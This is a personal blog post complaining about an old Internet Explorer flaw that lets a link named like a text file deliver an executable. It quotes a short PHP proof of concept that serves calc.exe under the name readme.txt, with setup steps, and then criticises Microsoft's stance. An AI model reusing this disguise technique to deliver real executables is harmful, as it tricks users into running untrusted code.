Insomnia (insomnia) wrote,
Insomnia
insomnia

HUGE security weakness in Internet Explorer

Looks like Internet Explorer has a bug in it that is so wide you can drive a truck through it. Imagine clicking on what seems to be a standard html link in IE and having it execute a program on your computer... the file extension could be anything - readme.txt, robot.wav, index.html ... ouch.

Apparently, a PHP exploit has been published on Bugtraq more than a week ago that demonstrates the vulnerability:



1. Copy the real windows calc.exe from a windows system to the html root dir.


2. Copy the readme.txt file below to the same html root dir.

3. go to the url http://yourserver/readme.txt

You will see the same behavior mentioned in the previous alert.


FILE <readme.txt> BEGIN ----
<?php
Header("Content-type: application/octet-stream");
Header("Content-Disposition: attachment; filename=calc.exe");
readfile("calc.exe");
?>
FILE <readme.txt> END ----




Unfortunately, Microsoft doesn't consider this is a vulnerability; they say that the trust decision should be based on the file source and not type. Who can you trust? Hm... that's a hard one, considering that even reputable commercial software vendors have been (accidentally) guilty of distributing virii along with their software... and can you trust any link on any personal site (such as a journal, weblog, etc.) really? Unfortunately, this bug is so sweeping that it stops making this issue a matter of trust, and more a matter of blind faith that we won't be the ones effected. Does this mean that your "friends" can be infected by a virus that will email you with friendly banter and tell you to check out an innocuous looking link with a "safe" file extention?!

What Microsoft is really asking you to do is trust no one - except them. They refuse to see their great contributions in making the Internet such a dangerous place to be... meanwhile, virii that primarily target their software's security flaws routinely cost people billions of dollars a year.

Until Microsoft starts taking security a lot more seriously and stops pushing the responsibility entirely back on the user, there is only one simple solution to this bug - don't use IE anymore.
Subscribe
  • Post a new comment

    Error

    default userpic

    Your reply will be screened

    Your IP address will be recorded 

    When you submit the form an invisible reCAPTCHA check will be performed.
    You must follow the Privacy Policy and Google Terms of use.
  • 4 comments